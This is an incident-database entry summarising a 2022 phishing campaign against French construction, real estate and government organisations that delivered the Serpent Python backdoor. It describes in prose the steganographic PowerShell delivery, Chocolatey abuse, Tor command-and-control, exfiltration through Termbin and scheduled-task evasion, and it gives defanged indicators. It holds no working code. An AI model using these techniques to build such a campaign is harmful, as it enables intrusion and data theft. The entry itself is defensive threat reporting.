Cyber Incident Victim: France
Date:
Mar 2022
Location:
France
Summary
A cyberattack targeted French entities in construction, real estate, and government sectors via GDPR-themed emails containing malicious Word documents. Attackers leveraged macros to retrieve steganographic images hosting PowerShell scripts, which deployed the Chocolatey package manager to install Python dependencies and a backdoor called Serpent. This malware established Tor-based C2 channels, enabling command execution, output exfiltration via Termbin, and persistence through scheduled tasks masquerading as legitimate Windows processes. The campaign utilized novel evasion techniques including steganographic payload delivery, abuse of open-source tools, and signed binary proxy execution to bypass defenses, though the attackers' ultimate objectives remained undetermined.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 2 motives | 2 techniques |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
In early 2022, Proofpoint identified a targeted cyberattack campaign against French organizations in the construction, real estate, and government sectors. The threat actor sent phishing emails with French-language subjects such as "Candidature - Jeanne Vrakele" from spoofed addresses like jeanne.vrakele@gmail[.]com, masquerading as job applications containing GDPR compliance information. These emails delivered macro-enabled Microsoft Word documents that executed Visual Basic for Applications (VBA) macros upon enablement. The macros retrieved a steganographic image file hosted on a compromised Jamaican credit union website (fhccu[.]com), which concealed a base64-encoded PowerShell script within what appeared to be a cartoon image. This PowerShell script downloaded and installed the open-source Chocolatey package manager, a previously unseen technique in malicious campaigns, which then installed Python and the pip package manager. The script subsequently fetched a second steganographic image from the same domain containing a base64-encoded Python backdoor, saved as MicrosoftSecurityUpdate.py, and executed it via a batch file. The final stage involved a shortened URL redirecting to the legitimate Microsoft Office help website, potentially as a diversionary tactic.
The Python backdoor, dubbed "Serpent" by researchers, established command-and-control communication through two Tor proxy domains using the .onion[.]pet top-level domain. It periodically polled the first C2 server for commands formatted as "<random integer>--<hostname>--<command>", executing them only if the specified hostname matched the infected system. After executing received commands via Windows shell, the malware transmitted output through PySocks to Termbin, a command-line pastebin service, and sent the resulting Termbin URL to the second C2 server via HTTP headers. Attackers additionally employed a novel detection evasion technique using schtasks.exe to create a scheduled task triggered by a dummy Windows Event ID 777, executing arbitrary executables like calc.exe as child processes of the legitimate taskhostsw.exe binary. Proofpoint detected all associated malicious documents and published Emerging Threat signatures targeting Chocolatey-related network traffic and malicious script retrieval patterns. The campaign’s precise impact remained unconfirmed, though successful compromise would have enabled remote administration, data exfiltration, or additional payload deployment. No attribution to known threat actors was established during the investigation.